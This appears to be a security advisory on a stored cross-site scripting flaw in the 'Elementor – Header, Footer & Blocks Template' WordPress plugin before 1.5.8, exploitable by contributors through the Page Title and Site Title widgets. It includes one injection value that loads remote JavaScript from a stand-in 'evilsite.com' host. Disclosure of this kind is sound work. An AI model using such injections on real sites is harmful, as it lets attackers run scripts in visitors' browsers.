Elementor - Header, Footer & Blocks Template < 1.5.8 - Contributor+ Stored XSS

The “Elementor – Header, Footer & Blocks Template” WordPress Plugin before 1.5.8 has two widgets that are vulnerable to stored Cross-Site Scripting (XSS) by lower-privileged users such as contributors, all via a similar method. The “Page Title” widget accepts a “heading_tag” parameter. Although the element control lists a fixed set of possible html tags, it is possible to send a ‘save_builder’ request with the “heading_tag” set to “script”, and the actual page title set to JavaScript. This JavaScript will then be executed when the saved page is viewed or previewed. Alternatively, the “heading tag” can be set to “script” and the “size” parameter can be set to a remotely sourced script, e.g. “medium" src="https://evilsite.com/alertscript.js”. The remotely hosted JavaScript will then be executed when the saved page is viewed or previewed. The “Site Title” widget can likewise be exploited by setting the “heading_tag” parameter to “script” and the “size” parameter to a remotely sourced script - most attackers would not be able to manipulate the actual site title itself, but this might also be exploitable in a similar way to the page title. These vulnerabilities are nearly identical to the vulnerabilities we have recently disclosed in the main Elementor plugin: https://www.wordfence.com/blog/2021/03/cross-site-scripting-vulnerabilities-in-elementor-impact-over-7-million-sites/